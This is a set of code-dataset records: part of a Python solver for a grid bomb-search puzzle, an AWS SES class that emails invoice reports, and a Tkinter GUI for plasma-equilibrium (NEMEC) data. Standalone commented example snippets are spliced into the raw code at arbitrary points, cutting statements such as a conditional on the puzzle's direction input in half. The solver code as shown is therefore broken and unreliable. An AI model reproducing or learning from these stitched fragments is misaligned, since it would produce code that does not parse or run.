d > dM:\n dM = d\n res = pp\n return res\n dmax1 = 0\n dmax2 = 0\n res1 = None\n res2 = None\n for s in self.seg:\n d = s.p1.dist(p)\n if d > dmax1:\n dmax2 = dmax1\n res2 = res1\n dmax1 = d\n res1 = s.p1\n elif d > dmax2:\n dmax2 = d\n res2 = s.p1\n return res2\n\n def area(self):\n if self._single_seg:\n l, p1, p2, _ = self._single_seg\n return p1.dist(p2)\n else:\n c = self.center()\n total = 0\n for s in self.seg:\n a = s.length()\n p = s.line.ortho(c).intersect(s.line)\n total = total + s.length() * p.dist(c)\n return total\n\n def length(self):\n if self._single_seg:\n l, p1, p2, _ = self._single_seg\n return 2 * p1.dist(p2)\n else:\n return sum(s.p1.dist(s.p2) for s in self.seg)\n\n\nDEBUG(\"Start\")\n\n# w: width of the building.\n# h: height of the building.\nw, h = [int(i) for i in input().split()]\nn = int(input()) # maximum number of turns before game over.\nx0, y0 = [int(i) for i in input().split()]\n\ncurPos = Pos(x0, y0)\nprev_pos = curPos\n\narea = Polyedre()\nDEBUG(\"SIZE: %d , %d\" % (w, h))\nDEBUG(\"is inside %s : %d\" % (curPos, area.isInside(curPos)))\n\ndone = []\n\nif w == 1:\n possible = [Pos(0, y) for y in range(h)]\nelif h == 1:\n possible = [Pos(x, 0) for x in range(w)]\nelse:\n possible = []\n\n# game loop\nwhile True:\n DEBUG(\"Possible:%d\" % len(possible))\n DEBUG(\"Len=%d\" % area.length())\n # if len(possible)<10:DEBUG(\".\".join([\"%s\"%p for p in possible]))\n bomb_dir = input()\n DEBUG(\"Input=%s\" % bomb_dir)\n pCenter = prev_pos.middle(curPos)\n if bomb_dir != \"UNKNOWN\":\n if prev_pos == curPos:\n mediane = None\n else:\n mediane = Line(prev_pos, curPos).ortho(pCenter)\n\n if bomb_dir 
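
# on_line (above in this record) walks the integer grid points along a line by
# repeatedly adding a primitive step (dx, dy). The same enumeration in
# isolation: the lattice points of a segment with integer endpoints are the
# endpoint plus integer multiples of the direction divided by its gcd. This is
# an illustrative sketch with names of my own choosing.

import math

def lattice_points(p, q):
    """All integer points on the segment from p to q, inclusive."""
    (x1, y1), (x2, y2) = p, q
    g = math.gcd(abs(x2 - x1), abs(y2 - y1))
    if g == 0:
        return [p]                           # degenerate segment: p == q
    dx, dy = (x2 - x1) // g, (y2 - y1) // g
    return [(x1 + i * dx, y1 + i * dy) for i in range(g + 1)]

assert lattice_points((0, 0), (4, 2)) == [(0, 0), (2, 1), (4, 2)]
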
== \"UNKNOWN\":\n bestPoint = Pos(w - 1 - x0, h - 1 - y0)\n elif bomb_dir == \"SAME\":\n # if mediane:DEBUG(\"Intersect:%s\"%\"/\".join([\"%s\"%i for i in area.intersect(mediane)]))\n l = Line(prev_pos, curPos)\n lo = l.ortho(prev_pos.middle(curPos))\n DEBUG(\"Create %s => %s (%s)\" % (prev_pos, curPos, lo))\n new_poss = area.on_line(lo)\n DEBUG(\"Nb poss=%d\" % (len(new_poss)))\n if len(new_poss) == 1:\n possible = new_poss[:]\n\n poss2 = []\n if possible:\n # restrict possible positions\n for p in possible[:]:\n if p in new_poss: poss2.append(p)\n possible = poss2\n DEBUG(\"restrict Poss to %d elements\" % len(possible))\n if len(possible) == 1: DEBUG(\"POS=%s\" % possible[0])\n else:\n if len(new_poss) < 20: possible = new_poss\n if possible:\n bestPoint = possible[0]\n\n else:\n pos_side = curPos if (bomb_dir == \"WARMER\") else prev_pos\n \"\"\"\n Add new line and limits\n \"\"\"\n area.addLine(mediane, pos_side)\n DEBUG(\"Area=%s\" % (area))\n\n if possible:\n for p in possible[:]:\n if not area.isInside(p): possible.remove(p)\n \"\"\"\n Find next target\n \"\"\"\n if not possible:\n xm, ym, xM, yM = area.size()\n dx, dy = xM - xm, yM - ym\n possible = []\n if dx + dy < 10:\n # check possible points\n DEBUG(\"Size %s,%s\" % (dx, dy))\n for x in range(xm, xM + 1):\n for y in range(ym, yM + 1):\n p = Pos(x, y)\n if area.isInside(p):\n DEBUG(\"Check %s,%s\" % (x, y))\n possible.append(p)\n\n pCenter = area.center()\n pFar = area.aPointFarFrom(curPos)\n if False:\n l = Line(curPos, pCenter).ortho(pCenter)\n p = area.intersect(l)[0]\n bestPoint = p\n elif area.is_1d():\n # got to middle of remaining area\n bestPoint = area.center()\n if bestPoint == curPos:\n bestPoint = pFar\n elif possible:\n DEBUG(\"Curr is %s\" % curPos)\n DEBUG(\"Centre is %s\" % pCenter)\n bestPoint = symm(curPos, pCenter, 0.95)\n DEBUG(\"bestPoint is %s\" % bestPoint)\n\n elif True:\n try:\n # Simulate positions to find which one will best cut remaining area in 2 equal zones\n square = Polyedre()\n l0 = area.length()\n RATIO_THR = 0.95\n NB_ITER_MAX = 7\n max_ratio = 0\n best_pos = None\n _done = [curPos]\n ax, ay, aX, aY = [float(x) for x in area.size()]\n ax, ay, aX, aY = ax - 1, ay - 1, aX + 1, aY + 1\n DEBUG(\"From %s\" % (curPos))\n aa = area.area()\n for direction in range(10, 360)[::3]:\n if max_ratio > RATIO_THR: break\n # DEBUG (\"From %s(%s)\"%(curPos,direction))\n direction = math.pi * direction / 180.0\n x, y = curPos.get()\n p0 = Pos(x, y)\n cs = math.cos(direction)\n sn = math.sin(direction)\n if cs < 0 and x < ax: continue\n if sn < 0 and y < ay: continue\n if cs > 0 and x > aX: continue\n if sn > 0 and y > aY: continue\n DEBUG(\"Direction %d (%d,%d)\" % (direction * 180 / 3.14159, cs * 100, sn * 100))\n if cs < 0:\n dx = (x - ax)\n else:\n dx = (aX - x)\n if sn < 0:\n dy = (y - ay)\n else:\n dy = (aY - y)\n NB_ITER = float(NB_ITER_MAX)\n dd = max(dx, dy) / NB_ITER\n dd = max(dd, 1)\n dx, dy = cs * dd, sn * dd\n ratio_prec = 0\n ratio = 0\n # DEBUG (\"2 (%s,%s)\"%(dx,dy))\n while ratio < RATIO_THR:\n x = x + dx\n y = y + dy\n dx, dy = dx * 1.2, dy * 1.20\n # DEBUG (\"3 (%s,%s)\"%(x,y))\n xi, yi = int(x + 0.5), int(y + 0.5)\n p2 = Pos(xi, yi)\n p3 = symm(p0, p2)\n if p3 in _done:\n # DEBUG (\"NOK: %s skip done\"%p3)\n continue\n _done.append(p3)\n if not square.isInside(p3):\n # DEBUG (\"NOK:%s out\"%p3)\n break\n l2 = Line(p2, p0)\n mediane = l2.ortho(p2)\n a2 = area.copy()\n try:\n a2.addLine(mediane, p0)\n except:\n continue\n a2a = a2.area()\n if a2a == 0: continue\n if a2a + 0.5 > aa:\n 
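
# The WARMER/COLDER branch earlier in this record feeds addLine the
# perpendicular bisector of the previous and current guesses: WARMER keeps the
# half-plane nearer the current guess, COLDER the other one. On an explicit
# candidate list the same pruning is just a distance comparison; a sketch, with
# names of my own choosing:

def prune(candidates, prev, cur, answer):
    """Keep the candidate cells consistent with a WARMER/COLDER/SAME answer."""
    def d2(p, q):
        return (p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2
    if answer == "WARMER":
        return [p for p in candidates if d2(p, cur) < d2(p, prev)]
    if answer == "COLDER":
        return [p for p in candidates if d2(p, cur) > d2(p, prev)]
    return [p for p in candidates if d2(p, cur) == d2(p, prev)]   # SAME

cells = [(x, 0) for x in range(10)]
# Moving from x=0 to x=4 and hearing WARMER keeps every cell with x > 2.
assert prune(cells, (0, 0), (4, 0), "WARMER") == [(x, 0) for x in range(3, 10)]
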
DEBUG(\"Stop dir %d:%f\" % (direction * 180 / 3.1415, a2a))\n break\n # a3= area.copy()\n # try:a3.addLine(mediane,p3)\n # except:continue\n # a3a=a3.area()\n if ratio_prec == 0:\n dx, dy = cs * dd, sn * dd\n ratio = aa / (2 * a2a)\n if ratio > 1: ratio = 1 / ratio\n if ratio > max_ratio:\n max_ratio = ratio\n best_pos = p3\n DEBUG(\"Placing at %s => r=%d%%\" % (p3, ratio * 100))\n DEBUG(\"dx,dy=%s %s\" % (dx, dy))\n # else: DEBUG (\"NOK:Placing at %s => r=%d%%\"%(p3,ratio * 100))\n if ratio_prec > ratio:\n DEBUG(\"Stopping at %s => r=%d%%\" % (p3, ratio * 100))\n break\n ratio_prec = ratio\n bestPoint = best_pos\n DEBUG(\"Placing at %s => r=%0.2f%%\" % (best_pos, max_ratio * 100))\n\n if not bestPoint or max_ratio < 0.5:\n l = Line(curPos, pCenter).ortho(pCenter)\n p = area.intersect(l)[0]\n bestPoint = p\n except Exception as e:\n DEBUG(\"Exception\")\n raise e\n else:\n bestPoint = area.aPointFarFrom(curPos).middle(pCenter)\n\n if possible:\n # WHICH possible point is closer to bestPoint?\n dMin = w + h\n pMin = None\n for p in possible:\n d = p.dist(bestPoint)\n if d < dMin:\n DEBUG(\"CLOSER point %s:%f\" % (p, d))\n dMin = d\n pMin = p\n DEBUG(\"found closest point to %s: %s\" % (bestPoint, pMin))\n if pMin: bestPoint = pMin\n bestPoint.force_inside()\n\n DEBUG(\"BestPoint is %s\" % bestPoint)\n prev_pos = curPos\n curPos = bestPoint\n\n done.append(bestPoint)\n if possible and bestPoint in possible: possible.remove(bestPoint)\n print(bestPoint.intStr())","sub_path":"ShadowOfNight/Episode 2/Other coders/shadowNight_masterglob_Lvl27.py","file_name":"shadowNight_masterglob_Lvl27.py","file_ext":"py","file_size_in_byte":19834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"71342997","text":"import os\nfrom boto3.session import Session\nfrom datetime import datetime\nfrom email.mime.text import MIMEText\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\n\n\nclass Email():\n def __init__(self):\n self.client = Session(# IAM User bumbol-api\n aws_access_key_id=os.environ['ses_key'],\n aws_secret_access_key=os.environ['ses_secret'],\n region_name=\"us-west-2\").client('ses')\n now = datetime.utcnow()\n self.datetimestr = now.strftime('%m/%d/%Y')\n \n \n def send_single_report(self, info):\n print(\"send_single_report()\")\n self.load_single_template(info)\n response = self.send_with_attachments(info)\n return response\n \n def send_with_attachments(self, info):\n now = datetime.utcnow()\n datestr = now.strftime('%Y-%m-%d')\n print(\"send_with_attachments\")\n filename = \"Invoice-{}-{}.pdf\".format(info[\"invoice_number\"], datestr)\n msg = MIMEMultipart('alternative')\n msg['Subject'] = 'Report for Invoice #{}'.format(info[\"invoice_number\"])\n msg['From'] = 'Bumbol Reports '\n msg['To'] = '{} {} <{}>'.format(info['f_name'], info['l_name'], info['to'])\n msg.preamble = 'Multipart message.\\n'\n # Text Part\n part = MIMEText(self.text_body, 'plain')\n msg.attach(part)\n # HTML\n part = MIMEText(self.html_body, 'html')\n msg.attach(part)\n # Report\n part = MIMEApplication(open(info[\"report_file\"], 'rb').read())\n part.add_header('Content-Disposition', 'attachment', filename=filename)\n msg.attach(part)\n # Send Email\n response = self.client.send_raw_email(\n RawMessage={\n 'Data': msg.as_string()\n },\n Source=msg['From'],\n Destinations=[msg['To']]\n )\n return response\n \n \n def send(self):\n response = self.client.send_email(\n Source='reports@bumbol.com',\n Destination={\n 
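
# send_with_attachments (just above in this record) builds a raw MIME message
# for SES send_raw_email. The assembly itself needs only the standard library;
# a minimal standalone version with placeholder addresses. Note this sketch uses
# the 'mixed' multipart subtype, the conventional choice for attachments (the
# record uses 'alternative').

from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def build_report_mail(pdf_bytes, filename):
    msg = MIMEMultipart("mixed")
    msg["Subject"] = "Report"
    msg["From"] = "sender@example.com"       # placeholder address
    msg["To"] = "recipient@example.com"      # placeholder address
    msg.attach(MIMEText("Your report is attached.", "plain"))
    part = MIMEApplication(pdf_bytes)
    part.add_header("Content-Disposition", "attachment", filename=filename)
    msg.attach(part)
    return msg.as_string()   # suitable for SES send_raw_email(RawMessage={'Data': ...})

raw = build_report_mail(b"%PDF-1.4 ...", "invoice.pdf")
assert "Content-Disposition: attachment" in raw
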
'ToAddresses': [\n self.to,\n ]\n },\n Message={\n 'Subject': {\n 'Data': 'Invoice Report',\n 'Charset': 'UTF-8'\n },\n 'Body': {\n 'Text': {\n 'Data': self.text_body,\n 'Charset': 'UTF-8'\n },\n 'Html': {\n 'Data': self.html_body,\n 'Charset': 'UTF-8'\n }\n }\n },\n ReplyToAddresses=[\n 'support@bumbol.com'\n ],\n ReturnPath='support@bumbol.com'\n )\n return response\n \n \n # Load Template\n def load_single_template(self, info):\n # Open html template file\n filein = open('SingleReportEmailTemplate.html')\n # read it\n src = filein.read()\n # format\n d = {\"f_name\": info[\"f_name\"], \"l_name\": info[\"l_name\"], \"invoice_number\": info[\"invoice_number\"], \"company_name\": info[\"company_name\"], \"date\": self.datetimestr}\n self.html_body = src.format(**d)\n # Text version\n self.text_body = \"Invoice Report \\r\\n \\r\\n\"\\\n \"Hello {f_name}, \\r\\n\"\\\n \"Your requested report is attached to this email. If you did not request a report please verify the sender before opening. \\r\\n \\r\\n\"\\\n \"Requested by {f_name} {l_name} on {date} \\r\\n\"\\\n \"Company: {company_name} \\r\\n\"\\\n \"Invoice: #{invoice_number} \\r\\n \\r\\n\"\\\n \"Bumbol never sends .zip or .exe files. \\r\\n \\r\\n \\r\\n\"\\\n \"This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message. \\r\\n\"\\\n \"Please contact support@bumbol.com with any technical issues. \".format(**d)\n \n # Load Template\n def load_multi_template(self):\n # Open template file\n filein = open('ReportEmailTemplate.html')\n # read it\n src = filein.read()\n # format\n heading = \"Invoice Report\"\n d = {'heading':heading, 'details':None }\n self.html_body = src.format(**d)\n ","sub_path":"invoice_reports_service/EmailClass.py","file_name":"EmailClass.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"157635830","text":"import os, sys\nsys.path.append('/afs/ipp/home/g/git/python/repository')\ntry:\n import Tkinter as tk\n import ttk\nexcept:\n import tkinter as tk\n from tkinter import ttk\nimport numpy as np\nimport ufiles, nemec, mom2rz\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom matplotlib.widgets import Slider\nimport map_equ_20180130\nfrom tooltip import createToolTip\nfrom multiprocessing import Pool, cpu_count\n\neqm = map_equ_20180130.equ_map()\n\nmomtyp = ('R cos', 'R sin', 'z cos', 'z sin')\n\nclass GEO_NEMEC:\n\n\n timeout = 1e-10\n\n\n def __init__(self, nshot, fmframe=None):\n\n if fmframe is None:\n if __name__ == '__main__':\n fmframe = tk.Tk()\n import trgui_style\n else:\n fmframe = tk.Toplevel()\n\n fmframe.geometry('1300x950')\n\n# Widgets style\n\n\n# Menu bar\n\n menubar = tk.Menu(fmframe)\n filemenu = tk.Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Run NEMEC\", command=self.surf)\n filemenu.add_command(label=\"Store u-files\", command=self.store_u)\n filemenu.add_separator()\n filemenu.add_command(label=\"Close\", command=fmframe.destroy)\n menubar.add_cascade(label = \"File\", menu=filemenu)\n fmframe.config(menu = menubar)\n\n canvframe = ttk.Frame(fmframe, height=850)\n entframe = ttk.Frame(fmframe)\n self.toolframe = ttk.Frame(fmframe)\n for frame in canvframe, entframe, self.toolframe:\n frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.nbplot = ttk.Notebook(canvframe)\n self.nbplot.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n 
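
# The GEO_NEMEC GUI in this record embeds Matplotlib figures in ttk Notebook
# tabs via FigureCanvasTkAgg. The minimal pattern, stripped of everything
# application-specific (this sketch needs a display to run; get_tk_widget() is
# the public accessor for the canvas widget the record reaches via _tkcanvas):

try:
    import tkinter as tk
    from tkinter import ttk
except ImportError:                      # Python 2 fallback, as in the record
    import Tkinter as tk
    import ttk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure

root = tk.Tk()
nb = ttk.Notebook(root)
nb.pack(fill=tk.BOTH, expand=1)
tab = ttk.Frame(nb)
nb.add(tab, text="Plot")

fig = Figure(figsize=(4, 3), dpi=100)
ax = fig.add_subplot(111)
ax.plot([0, 1, 2], [0, 1, 4])
canvas = FigureCanvasTkAgg(fig, master=tab)
canvas.get_tk_widget().pack(fill=tk.BOTH, expand=1)
canvas.draw()
# root.mainloop()   # uncomment to run interactively
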
self.nbplot.bind('', self.on_click)\n\n pol_frame = ttk.Frame(self.nbplot)\n mom_frame = ttk.Frame(self.nbplot)\n profframe = ttk.Frame(self.nbplot)\n self.nbplot.add(pol_frame, text='Poloidal plot')\n self.nbplot.add(mom_frame, text='Fourier moments')\n self.nbplot.add(profframe, text='EQuilibrium profiles')\n\n self.proffig = Figure(figsize=(4., 8.), dpi=100)\n self.pol_fig = Figure(figsize=(6., 8.), dpi=100)\n self.mom_fig = Figure(figsize=(6., 8.), dpi=100)\n\n self.proffig.subplots_adjust(left=0.2, bottom=0.1, right=0.8 , top=0.9)\n self.pol_fig.subplots_adjust(left=0.06, bottom=0.1, right=0.98, top=0.9)\n self.mom_fig.subplots_adjust(left=0.08, bottom=0.1, right=0.98, top=0.9)\n\n self.profcanvas = FigureCanvasTkAgg(self.proffig, master=profframe)\n self.pol_canvas = FigureCanvasTkAgg(self.pol_fig, master=pol_frame)\n self.mom_canvas = FigureCanvasTkAgg(self.mom_fig, master=mom_frame)\n\n self.profcanvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.pol_canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.mom_canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n#-----------------\n# Initialise plots\n#-----------------\n\n self.pol_fig.text(.5, .99, r'NEMEC equilibrium, constant $\\rho$ and constant $\\theta$ contours', \\\n ha='center', va='top')\n self.mom_fig.text(.5, .99, 'NEMEC Fourier moments', ha='center', va='top')\n\n# Profiles\n\n fsize = 16\n\n self.qsub = self.proffig.add_subplot(311)\n self.qsub.set_xlim(0,1)\n self.qsub.set_xlabel(r'$\\rho_{tor}$',fontsize=fsize)\n self.qsub.set_ylabel('q profile')\n\n self.psub = self.proffig.add_subplot(312)\n self.psub.set_xlim((0, 1))\n self.psub.set_xlabel(r'$\\rho_{tor}$',fontsize=fsize)\n self.psub.set_ylabel('Pressure [Pa]')\n\n self.rbsub = self.proffig.add_subplot(313)\n self.rbsub.set_xlim(0,1)\n self.rbsub.set_xlabel(r'$\\rho_{tor}$',fontsize=fsize)\n self.rbsub.set_ylabel('R*B$_\\phi$')\n\n#---------------\n# Player buttons\n\n locdir = os.path.dirname(os.path.realpath(__file__))\n self.playfig = tk.PhotoImage(file='%s/play.gif' %locdir)\n self.pausefig = tk.PhotoImage(file='%s/pause.gif' %locdir)\n self.forwardfig = tk.PhotoImage(file='%s/forward.gif' %locdir)\n self.backwardfig = tk.PhotoImage(file='%s/backward.gif' %locdir)\n\n backward_button = ttk.Button(self.toolframe, command=self.Backward,image=self.backwardfig)\n self.play_button = ttk.Button(self.toolframe, command=self.Play, image=self.playfig)\n forward_button = ttk.Button(self.toolframe, command=self.Forward, image=self.forwardfig)\n\n createToolTip(forward_button , 'Go to next timestep')\n createToolTip(backward_button , 'Go backward by one timestep')\n createToolTip(self.play_button, 'Forward animation/pause')\n\n for but in backward_button, self.play_button, forward_button:\n but.pack(side=tk.LEFT)\n\n# Entry frame\n geoinit = {'shot': nshot, 'Nmom': 7, 'ntheta': 101, 'nrho': 81, \\\n 'exp': 'AUGD', 'dia': 'EQH', 'ed': 0, \\\n 'tbeg': 4, 'tend': 6., 'DeltaT': 0.1}\n\n self.geodict = {}\n\n for key in ('shot', 'tbeg', 'tend', 'DeltaT', \\\n 'exp', 'dia', 'ed', \\\n 'Nmom', 'ntheta', 'nrho'):\n raw = ttk.Frame(entframe)\n raw.pack(side=tk.TOP)\n lbl = ttk.Label(entframe, text=key, width=5).pack(side=tk.LEFT)\n var = ttk.Entry(entframe, width=5)\n var.insert(0, geoinit[key])\n var.pack(side=tk.LEFT, padx='2 7')\n self.geodict[key] = var\n\n self.psep = self.pol_fig.add_subplot(111, aspect='equal')\n self.psep.set_xlim((0.8, 3.0))\n self.psep.set_ylim((-1.4, 1.4))\n self.psep.set_xlabel('R [m]')\n self.psep.set_ylabel('z 
[m]')\n\n nshot_in = int(geoinit['shot'])\n gc_r, gc_z = map_equ_20180130.get_gc(nshot_in)\n for key in gc_r.keys():\n self.psep.plot(gc_r[key], gc_z[key], 'b-')\n\n toolbar = NavigationToolbar2TkAgg(self.pol_canvas, pol_frame)\n toolbar.update()\n toolbar = NavigationToolbar2TkAgg(self.mom_canvas, mom_frame)\n toolbar.update()\n toolbar = NavigationToolbar2TkAgg(self.profcanvas, profframe)\n toolbar.update()\n\n if __name__ == '__main__':\n fmframe.mainloop()\n\n\n def surf(self):\n\n self.nshot = int(self.geodict['shot'].get())\n dianam = self.geodict['dia'].get().strip()\n expnam = self.geodict['exp'].get().strip()\n ed = int(self.geodict['ed'].get().strip())\n delta_t = float(self.geodict['DeltaT'].get().strip())\n\n# Parameters for kk\n\n npfm = 1001\n mpfm = 1001\n\n nrzmax = 1000\n mom_type = len(momtyp)\n self.mom_order = int(self.geodict['Nmom'].get().strip())\n n_the_u = int(self.geodict['ntheta'].get().strip())\n n_rho_u = int(self.geodict['nrho'].get().strip())\n\n tbeg = float(self.geodict['tbeg'].get().strip())\n tend = float(self.geodict['tend'].get().strip())\n\n#==============\n# kk-time grid\n#==============\n\n if eqm.Open(self.nshot, diag=dianam, exp=expnam, ed=ed):\n eqm._read_profiles()\n\n ind_ok = []\n\n tim_old = -np.infty\n# Allow delta_t\n for jt, tim in enumerate(eqm.t_eq):\n if (tim >= tbeg) and (tim <= tend) and (tim > tim_old + delta_t):\n ind_ok.append(jt)\n tim_old = tim\n\n self.tarr = eqm.t_eq[ind_ok]\n self.nt = len(self.tarr)\n self.rho_u = np.linspace(0, 1, n_rho_u)\n\n self.q_u = np.zeros((n_rho_u, self.nt))\n self.pres_u = np.zeros((n_rho_u, self.nt))\n self.rbphi_u = np.zeros((n_rho_u, self.nt))\n\n vmec_dic = { 'nshot':self.nshot, 'mdescur':self.mom_order, \\\n 'exp':expnam, 'dia':dianam, 'ed':ed, \\\n 'nrho_nem': 101, 'nthe_nem': 60}\n\n self.rsurf = np.zeros((self.nt, n_rho_u, n_the_u))\n self.zsurf = np.zeros((self.nt, n_rho_u, n_the_u))\n\n#===========\n# Time loop\n#===========\n\n tf = eqm.tf[ ::-1, ind_ok]\n q = - eqm.q[ ::-1, ind_ok]\n pres = eqm.pres[ ::-1, ind_ok]\n ffs = - 2e-7*eqm.jpol[::-1, ind_ok]\n\n q[-1, :] = 2.*q[-2, :] - q[-3, :]\n\n nmod = self.mom_order\n n_mom = nmod*mom_type\n\n self.mom_u = np.zeros((self.nt, n_rho_u, n_mom))\n self.rc = np.zeros((self.nt, n_rho_u, nmod))\n self.rs = np.zeros((self.nt, n_rho_u, nmod))\n self.zc = np.zeros((self.nt, n_rho_u, nmod))\n self.zs = np.zeros((self.nt, n_rho_u, nmod))\n\n for jt in range(self.nt):\n\n rhot = np.sqrt((tf[:, jt] - tf[0, jt])/(tf[-1, jt] - tf[0, jt]))\n\n# Profiles: q, pressure, R*Bphi\n self.q_u[:, jt] = np.interp(self.rho_u, rhot, q[:, jt])\n self.pres_u[:, jt] = np.interp(self.rho_u, rhot, pres[:, jt])\n self.rbphi_u[:, jt] = np.interp(self.rho_u, rhot, ffs[:, jt])\n\n# NEMEC for magnetic moments\n\n pool = Pool(cpu_count())\n out = pool.map(nemec.nemec, [(vmec_dic, self.tarr[jt], '%d' %jt) for jt in range(self.nt)])\n pool.close()\n pool.join()\n\n for jt in range(self.nt):\n rho_nem = out[jt][4]\n for jord in range(nmod):\n# rho_nem is a grid equispaced in tor. 
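
# surf() in this record maps each equilibrium profile from its native
# rho_tor = sqrt((Phi - Phi_0)/(Phi_edge - Phi_0)) grid onto a uniform one with
# np.interp. The resampling step in isolation, with made-up flux values:

import numpy as np

tf = np.array([0.0, 0.1, 0.4, 0.9, 1.6])         # toroidal flux (made-up values)
q = np.array([1.0, 1.1, 1.5, 2.4, 4.0])          # profile on the same grid
rhot = np.sqrt((tf - tf[0]) / (tf[-1] - tf[0]))  # native rho_tor grid, 0 .. 1
rho_u = np.linspace(0.0, 1.0, 81)                # uniform output grid
q_u = np.interp(rho_u, rhot, q)                  # resampled profile
assert q_u[0] == 1.0 and q_u[-1] == 4.0
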
flux, not in rho_tor\n self.rc[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][0][:, jord])\n self.rs[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][1][:, jord])\n self.zc[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][2][:, jord])\n self.zs[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][3][:, jord])\n\n for jord in range(nmod):\n fac = 1./(self.rho_u[1:]**jord)\n self.mom_u[..., 1:, jord] = fac[:]*self.rc[..., 1:, jord]\n self.mom_u[..., 1:, jord + nmod] = fac[:]*self.rs[..., 1:, jord]\n self.mom_u[..., 1:, jord + 2*nmod] = fac[:]*self.zc[..., 1:, jord]\n self.mom_u[..., 1:, jord + 3*nmod] = fac[:]*self.zs[..., 1:, jord]\n self.mom_u[..., 0, jord] = self.rc[..., 0, jord]\n self.mom_u[..., 0, jord + nmod] = 0.\n self.mom_u[..., 0, jord + 2*nmod] = self.zc[..., 0, jord]\n self.mom_u[..., 0, jord + 3*nmod] = 0.\n\n self.mom_u *= 100.\n\n self.rsurf, self.zsurf = mom2rz.mom2rz( self.rc, self.rs, \\\n self.zc, self.zs, nthe=n_the_u)\n\n# End of time loop\n self.begin()\n\n\n def store_u(self):\n\n tlbl = 'Time'.ljust(20) + 'Seconds'\n mlbl = 'MOMENT INDEX'\n dlbl = 'FOURIER MOMENTS'.ljust(20) + 'CM'\n rholbl = 'RHO_TOR'\n thlbl = 'THETA'.ljust(20) + 'RAD'\n rlbl = 'MAJOR RADIUS'.ljust(20) + 'M'\n zlbl = 'VERTICAL POSITION'.ljust(20) + 'M'\n\n n_the_u = self.rsurf.shape[2]\n theta = np.linspace(0, 2*np.pi, n_the_u)\n\n # NUBEAM R,z=f(t,rho,theta)\n\n uf_d = { 'pre': 'R', 'ext': 'SURF', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u}, \\\n 'Z': {'lbl': thlbl , 'arr': theta} }, \\\n 'data': {'lbl': rlbl, 'arr': self.rsurf} }\n ufiles.WU(uf_d)\n\n uf_d = { 'pre': 'Z', 'ext': 'SURF', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u}, \\\n 'Z': {'lbl': thlbl , 'arr': theta} }, \\\n 'data': {'lbl': zlbl, 'arr': self.zsurf} }\n ufiles.WU(uf_d)\n\n# q profile\n\n qlbl = 'Q'\n uf_d = { 'pre': 'Q', 'ext': 'EQ', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u} }, \\\n 'data': {'lbl': qlbl, 'arr': self.q_u} }\n ufiles.WU(uf_d)\n\n# Pressure profile\n\n plbl = 'P'.ljust(20) + '[Pa]'\n uf_d={ 'pre': 'P', 'ext': 'EQ', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u} }, \\\n 'data': {'lbl': plbl, 'arr': self.pres_u} }\n ufiles.WU(uf_d)\n\n# R*Bphi\n\n rblbl = 'R*Bphi'.ljust(20) + '[T*m]'\n uf_d={ 'pre': 'F', 'ext': 'EQ', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u} },\n 'data': {'lbl': rblbl, 'arr': self.rbphi_u} }\n ufiles.WU(uf_d)\n\n# Fourier moments\n\n n_mom = self.mom_u.shape[-1]\n marr = 1 + np.arange(n_mom)\n\n uf_d={ 'pre': 'M', 'ext': 'MMX', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u}, \\\n 'Z': {'lbl': mlbl , 'arr': marr} }, \\\n 'data': {'lbl': dlbl, 'arr': self.mom_u} }\n ufiles.WU(uf_d)\n\n\n#------------\n# Animation\n#------------\n\n def on_click(self, event):\n if event.widget.identify(event.x, event.y) == 'label':\n self.jtab = event.widget.index('@%d,%d' % (event.x, event.y))\n self.update_plot()\n\n def begin(self):\n self.stop = True\n self.jtab = 0\n self.jt = 0\n self.set_plots()\n\n def Pause(self):\n self.stop = True\n self.play_button['image'] = self.playfig\n self.play_button['command'] = self.Play\n\n def Forward(self):\n self.stop = True\n 
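
# mom2rz.mom2rz (called earlier in this record) turns Fourier moments back into
# flux surfaces. Assuming the usual convention
# R(theta) = sum_m rc[m]*cos(m*theta) + rs[m]*sin(m*theta), and likewise for z,
# the reconstruction for one surface is a short sketch (the convention is my
# assumption; the record's mom2rz module is not shown):

import numpy as np

def moments_to_surface(rc, rs, zc, zs, nthe=101):
    """Reconstruct one surface R(theta), z(theta) from its Fourier moments."""
    theta = np.linspace(0.0, 2.0 * np.pi, nthe)
    m = np.arange(len(rc))[:, None]              # mode numbers, one per row
    cos_mt, sin_mt = np.cos(m * theta), np.sin(m * theta)
    r = rc @ cos_mt + rs @ sin_mt
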